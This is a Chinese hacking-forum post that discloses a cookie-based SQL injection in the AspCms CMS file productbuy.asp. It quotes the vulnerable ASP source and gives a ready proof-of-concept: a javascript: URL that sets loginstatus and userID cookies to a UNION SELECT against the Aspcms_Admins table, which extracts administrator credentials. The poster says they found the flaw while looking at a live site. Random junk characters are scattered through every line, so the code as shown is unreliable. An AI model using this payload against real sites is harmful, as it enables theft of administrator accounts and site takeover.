好久没上土司了,上来一看发现在删号名单内.....) w0 v0 o) y: q% E, b
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
4 X: x* M8 V$ S" E' {废话不多说,看代码:
7 n. J" q' Z) n$ X. d H$ M
: `9 \; L x0 S5 s0 S8 j5 | f u<%
k* t0 ]: Q0 l& _2 s* @: V2 Z
% c% D* s% B) E: T% a( Eif action = "buy" then
% R: ?; _) ?7 s" p
9 m8 O, S5 A, ?6 b addOrder()+ p% j w3 c# A- x
% g; g; G4 q% y) k6 k, ]$ Qelse8 H( V# }5 y( X% I
7 }/ I8 X, i! j/ f7 W- V( R
echoContent()" z5 l( `7 O0 U! E
: N: s7 c5 [) X( l3 y1 Bend if
- }/ K8 R7 U- Y2 _+ ?) _
" v! l+ ^! R7 z2 L1 M# W' B! r* J- ~
* G" k: @" ]3 U9 h% w6 E. K F. m& v
……略过
2 j! H: F1 L6 o4 s! |
: x+ R, ^6 F3 d: n4 u/ _8 \! k! A. ]/ q9 i6 I4 @2 e( \7 o# N
! i6 Z) B) |$ r& |- r9 B
Sub echoContent()
* H5 c7 P" m, `0 l% w; M# \8 O8 H# }/ X) S9 n* r2 G, ^1 c& i
dim id5 d6 v3 f! h# p) y. O/ ]
/ n4 Z# k' `; h2 T$ Q- d; U
id=getForm("id","get")
! a, S5 f6 n7 K$ U) I ?% a6 m! u |! G! c
6 v" \/ z5 Q9 K0 J2 o/ t
5 j l j* o/ z: g/ u/ ^$ G, e7 M if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
) Z6 k2 {1 q, o# m" B
- M3 G8 g; i' s' h7 j4 u+ a% J
2 p+ A& y+ M' h3 k# x/ s! H$ s* k
5 S( Z# o# t2 C dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
* X7 Y; v; z9 b1 R. k) \7 q! A3 S1 n5 _5 I3 b
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct4 V) |7 e& |5 F) \8 b
) S9 ^5 A H( o9 \/ W3 a& R
Dim templatePath,tempStr
0 r; j0 o+ L. X, F, m0 l0 u0 x. I; ^9 a8 S0 U$ v) X
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"1 W3 t3 X$ v+ z
4 c* P* ~$ j) z+ G9 w
9 c. z8 x7 o1 o4 o# u+ n) c9 W1 _" M: @
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 [6 [! j% J1 F6 P
. R8 s' f% ?4 B3 ?' L selectproduct=rsObj(0): X' N+ V* ^6 l3 J* a3 K5 y, K
1 P9 I Q! P. q7 j
9 v8 f4 H4 z3 S3 m
7 |! l1 l( x1 f; i& E7 r
Dim linkman,gender,phone,mobile,email,qq,address,postcode
# l, T/ d: z/ y6 c* q" l' m8 U- i& C7 o5 o/ D7 q9 S* |) [
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
$ v* S( ?# ?( k9 Y
# {$ r8 B$ D* M; g y3 Z" |0 E8 b if rCookie("loginstatus")=1 then 7 H" s2 l( Y6 N5 o4 o; d! O/ R
5 g5 j9 A7 ^1 {6 g1 C- M% P
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")- `7 _9 a0 e" ~
3 s: a, K) x: @1 U linkman=rsObj("truename")4 j: V" T" C3 Z* s# K
. }; e$ S$ \! }4 H gender=rsObj("gender"), E, f# j0 J; f# w4 o
4 I) P3 L, f# J" _
phone=rsObj("phone")
6 i' f0 f& B! o# _4 }
% ^& z; V2 `" c mobile=rsObj("mobile")9 t" i" {# I1 J- H
. p1 z4 K b4 m2 j& ~2 y% @, N3 ^ email=rsObj("email")9 ?5 F; z8 B1 B3 | Y& w. F* y
; ?% A- R& g2 |' L" ]* d& O
qq=rsObj("qq"): K9 V* ]0 Z' }2 k! k6 F
/ L5 q: ~! Q/ u1 G# p
address=rsObj("address")
* u- M) E5 H& Q4 O. i. m* r) i4 v" v; f5 L' b& }
postcode=rsObj("postcode")$ H) X- H9 D \) F
1 v2 k% J5 m0 w else " ]: Y6 M! d% ~- i
! p, N. `2 q" b! r, U. } s- H gender=1
4 B4 k, N4 S+ |8 B: ^
" b0 M0 C* b2 D8 m) W' e end if4 d9 x# }. k& d( ^( k
9 s, A8 y3 A: V" h8 w9 \ rsObj.close()! C) j; |& k* F6 l6 o5 K3 N
4 B3 X6 c; }. b- L1 O" `3 f" D
* ~. o% z; w4 C# q/ V# p a; i+ K
, L0 W+ w5 S& H with templateObj
0 u$ ^* h' ^5 \; T3 m- _: a
" L3 ]+ r5 g6 K d7 f .content=loadFile(templatePath) ; d" y; P/ u$ ?5 C. r
; W# \- a1 E0 X9 i" p$ p3 O .parseHtml(). h. D( `3 l3 \& J) k" E
: K# x2 J! P9 k. s
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct); X8 u) t$ \8 R4 v9 d. O' F/ S
/ B9 ^8 R" L, W! {( X! o
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ) }, x5 y0 b: |, w5 c) @) @; P/ w
* r* c- K! _, U, t- F .content=replaceStr(.content,"[aspcms:gender]",gender)
2 i* k- R( s5 O% H2 o. n2 g8 R$ L6 n) K1 R
.content=replaceStr(.content,"[aspcms:phone]",phone) / D& k" {2 {" V3 q7 V4 g
9 ^4 t7 n& {- P9 e! x8 S/ \/ V .content=replaceStr(.content,"[aspcms:mobile]",mobile) : \* n! t2 V* A% G2 F
8 r& ?. m' B$ x
.content=replaceStr(.content,"[aspcms:email]",email)
8 \, U& c, A( M- g) J& X3 s
: f- [7 u5 F+ L: u .content=replaceStr(.content,"[aspcms:qq]",qq) 9 E; Y$ I- {3 a! p$ _# ?
1 V: ^4 f+ x0 V" d .content=replaceStr(.content,"[aspcms:address]",address)
5 p/ w1 U/ u" l' {2 G2 p0 A7 Y' z0 c2 e1 ^2 j3 q7 j
.content=replaceStr(.content,"[aspcms:postcode]",postcode) ~, d3 g" y* L2 i: i9 L
( `9 b# v$ I! v .parseCommon()
" i# ]& ]2 O( N- q
" n- g' ~, t1 G. L echo .content
+ l" d2 s0 [# C# D0 }3 ^
0 @& o5 J( ^( z, f" Q( [ end with6 s' Z. ], k8 x* J P8 U
5 i6 j1 `$ V2 E4 Q& ^
set templateobj =nothing : terminateAllObjects
$ g) F1 ^* e* Q; y
9 ], v( D( a6 m$ GEnd Sub
# G4 U; f6 G1 j; D+ ~' h! y漏洞很明显,没啥好说的9 \9 j3 _: ^* n0 E" k; f7 t$ ]
poc:$ @# ]! F: k" A( v' R' e
n7 T" e$ J1 H* i6 s9 U+ wjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
3 M* w: {0 n: o0 N- G$ {" a" W* {) y# F. c+ E+ W, X
|
发表于 2012-12-27 08:35:05
收藏
支持
反对